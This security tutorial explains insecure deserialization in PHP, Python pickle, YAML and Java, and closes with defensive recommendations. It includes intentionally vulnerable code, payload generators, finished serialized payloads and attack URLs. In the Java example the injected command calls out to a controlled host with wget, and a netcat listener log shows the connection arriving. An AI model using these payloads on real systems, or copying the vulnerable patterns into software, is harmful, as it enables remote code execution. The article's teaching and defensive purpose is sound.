Insecure deserialization
Introduction
What does deserialization mean?
Serialization is the process of representing structures and objects specific to a certain programming language in a single format, usually as a specific string format or a byte sequence.
Deserialization is the reverse process that involves the restoring of structures and objects from a serialized string or a byte sequence.
Serialization and deserialization are often used to save the program’s current state, for instance, on a hard drive or in a database, and to exchange data between various applications.
Modern programming languages provide convenient mechanisms to serialize and deserialize their structures. They are favored by developers for being easy and quick tools which do not require any additional libraries and save users the trouble of handling incompatible serialized data.
Meanwhile, serialization and deserialization mechanisms offer a greater variety of capabilities, rather than just representing objects in a single format. Unfortunately, many developers do not give due consideration to these mechanisms, which results in programming errors and, consequently, in serious application security problems.
Deserialization in PHP
PHP implements serialization and deserialization through the in-built serialize() and unserialize() functions, respectively.
The serialize() function takes an object as a parameter and returns its serialized representation as a string.
The unserialize() function takes a string that contains a serialized object as a parameter and returns a deserialized object restored from this string.
Let us consider a simple example.
<?php class Injection{ public $some_data; function __wakeup(){ if(isset($this->some_data)){ eval($this->some_data); } } } if(isset($_REQUEST['data'])){ $result = unserialize($_REQUEST['data']) // do something with $result object // ... } ?>
In this example, the Injection class is implementing the __wakeup() magic method. This method will be implemented once the Injection class object is deserialized, and, as illustrated, it will execute the code stored in the $some_data class variable.
Using the code below, we will generate the payload to exploit this type of structure.
<?php class Injection{ public $some_data; function __wakeup(){ if(isset($this->some_data)){ eval($this->some_data); } } } $inj = new Injection(); $inj->some_data = "phpinfo();"; echo(serialize($inj)); ?>
As a result of code execution, we get a serialized object as follows:
O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
Now let us inject this serialized object into our vulnerable application as data within the data parameter.
https://example.com/vulnerable.php?data=O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
The code execution and deserialization of the injected object will prompt the execution of the in-built phpinfo() function. This gives an attacker the opportunity to execute the code remotely in the vulnerable system.
It should be, however, noted that exploitation of insecure deserialization in PHP does not always lead to remote code execution. It may result in the reading or writing of random files, SQL injections, denial of service, etc.
For a successful attack, the target application must have classes, which implement the respective magic methods. Generally, the most useful methods for this purpose are __destruct(), __wakeup() and __toString(). Furthermore, to identify a vulnerable class or a string of classes (the so-called ’gadget’), the attacker must have access to the source code.
However, applications often come with various in-built frameworks that already contain the necessary gadgets. In this case, the payload can be generated with the help of the PHPGGC utility.
Deserialization in Python
Python and PHP have very similar serialization and deserialization mechanisms. In Python, these processes are implemented through the in-built pickle library.
pickle.dump() takes an object and a file name as parameters and dumps the serialized version of the object into the file with the given name.
pickle.load() takes the file name that contains a serialized object as a parameter and returns the deserialized object.
pickle.dumps() takes an object as a parameter and returns its serialized representation as a byte string.
pickle.loads() takes a byte string that contains a serialized object as a parameter and returns a deserialized object restored from this string.
Let us give a simple example.
import pickle from flask import request @app.route('vulnerable.py', methods=['GET']) def parse_request(): data = request.request.args.get('data') if (data): pickle.loads(data) # do something with result object # ...
Using the code below, we will generate the payload to exploit this type of structure.
import pickle class Payload(object): def __reduce__(self): return (exec, ('import os;os.system("ls")', )) pickle_data = pickle.dumps(Payload()) print(pickle_data)
As a result of code execution, we get a serialized object as follows:
b'\x80\x03cbuiltins\nexec\nq\x00X\x19\x00\x00\x00import os;os.system("ls")q\x01\x85q\x02Rq\x03.'
Now let us transfer this serialized and URL-encoded object to our vulnerable application as data within the data parameter:
https://example.com/vulnerable.py?data=%80%03cbuiltins%0Aexec%0Aq%00X%19%00%00%00import%20os%3Bos.system%28%22ls%22%29q%01%85q%02Rq%03.
The code execution and deserialization of the transferred object will prompt the os.system() function with an ls parameter to be called. This will produce a list of files in the current working directory of the application, giving the intruder possibility to execute the code in the vulnerable system remotely.
In the case of Python, no additional conditions are required for a successful attack. Therefore, to be on the safe side, you better avoid using pickle.loads() when deserializing untrusted data.
Deserialization in Java
Deserialization in Java is similar to the PHP and Python processes.
Usually, the following structures are employed:
- readObject() method of the java.beans.XMLDecoder class
- fromXML() method of the com.thoughtworks.xstream.XStream class
- readObject(), readObjectNodData(), readResolve(), readExternal(), readUnshared() methods of the java.io.ObjectInputStream class
Let us illustrate the use of the readObject() method of the java.io.ObjectInputStream class drawing on a simple example:
import java.util.*; import java.io.*; class Injection implements Serializable { public String some_data; private void readObject(ObjectInputStream in) { try { in.defaultReadObject(); Runtime.getRuntime().exec(some_data); } catch (Exception e) { System.out.println("Exception: " + e.toString()); } } } public class Main { public static void main(String[] args) { Object obj = new Object (); try { String inputStr = args[1]; byte[] decoded = Base64.getDecoder().decode(inputStr.getBytes("UTF-8")); ByteArrayInputStream bis = new ByteArrayInputStream(decoded); ObjectInput in = new ObjectInputStream(bis); obj = in.readObject(); // do something with result object // ... } catch (Exception e) { System.out.println("Exception: " + e.toString ()); } } }
Using the code below, we will generate the payload to exploit this type of structure.
import java.util.*; import java.io.*; class Injection implements Serializable { public String some_data; } public class Main { public static void main(String[] args) { try { Injection inj = new Injection(); inj.some_data = "wget http://example.com:8080"; ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(inj); oos.close(); System.out.println(new String(baos.toByteArray())); System.out.println(Base64.getEncoder().encodeToString(baos.toByteArray())); } catch (Exception e) { System.out.println ("Exception: " + e.toString ()); } } }
As a result of code execution, we get a serialized object as follows:
��sr Injection��+r7�L some_datatLjava/lang/String;xptwget http://example.com:8080
And, for the convenient interaction with binary data, the same object represented in the base64-encoded format:
rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==
Let us transfer this serialized and base64-encoded object to our vulnerable application as an input parameter.
java -jar vulerable.jar rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==
The code execution and deserialization of the transferred object prompts the Runtime.getRuntime().exec() function with the wget http://example.com:8080 parameter to be called, which is further confirmed on the controlled server example.com:
root@example.com:~$ nc -lvnp 8080 listening on [any] 8080 ... connect to [***.***.***.***] from (UNKNOWN) [***.***.***.***] 45430 GET / HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: example.com:8080 Connection: Keep-Alive
This is how the attacker is able to perform remote code execution in the vulnerable system.
Same as in PHP, to enable remote code execution in Java, the application must have the required class that would implement the Serializable interface. In our example, this is the Injection class. Again, it is almost impossible to find the suitable gadget without having access to the source code. Where the application uses certain in-built frameworks and class libraries, the payload can be generated with the help of the ysoserial utility.
YAML Deserialization
There is a variety of languages and frameworks that enable remote code execution during the course of YAML deserialization.
For example, execution of a similar code in Python will result in the output of the current directory listing:
import yaml yaml.load("!!python/object/new:os.system [ls -la]", Loader=yaml.UnsafeLoader)
This is quite a widespread problem. However, this article does not provide specific examples, since the YAML file processing functionality is implemented differently in various languages.
As you can see from the code snippet above, the Loader=yaml.UnsafeLoader argument was passed explicitly when calling the yaml.load() function. This is important: the latest versions of the library do not allow using vulnerable methods by default.
Thus, an attempt to call yaml.load() without additional parameters, will result in an error message:
main.py:3: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.
However, in the earlier versions, the yaml.load() function did not limit the execution of control structures. Therefore, the yaml.safe_load() function had to be used for secure deserialization of untrusted YAML. Nonetheless, you can still come across this vulnerability in many applications that use earlier library versions to work with YAML.
Given the above, we recommend using trusted structures such as yaml.safe_load(), rather than relying on the foresight of the library vendor.
Conclusion
Serialization and deserialization are indeed powerful and flexible tools. They provide developers with a convenient way to manipulate, transmit and save data on hard drives or in databases. However, like any other tool, it should be used correctly with security precautions in mind.
Let’s face it, there is no simple and universal method to protect an application from deserialization attacks (except maybe not using this mechanism). You are therefore encouraged to follow our recommendations for the safe use of deserialization:
- Apply secure deserialization methods where possible, e.g. yaml.safe_load() instead of yaml.load().
- Use simpler formats, e.g. JSON, to transmit and save data on the hard drive or in the database. While generally having less functionality, they do not carry such serious threats as embedded serialization mechanisms.
- Keep a white list of allowed classes. The developer may redefine the standard deserialization functionality, and check whether the object being uploaded is allowed to be deserialized and whether the structures used in the serialized object are secure.
- Sign transmitted serialized data. This is a good option for network data exchange between applications. Without knowing the secret key, which is used to sign the transmitted data, the attacker will not be able to make any modifications. However, it should be noted that the application or the secret key may be compromised in a different way, which may have an adverse impact on the security of related applications.
- Use third-party libraries and frameworks specifically designed to improve the security of deserialization processes (e.g. SerialKiller or NotSoSerial for Java).
It is not always easy to adhere to these recommendations, especially where the developer is required to support the existing code. However, given that deserialization attacks may lead to remote code execution and overall system compromise, such extra efforts and time are fully justified and worth it.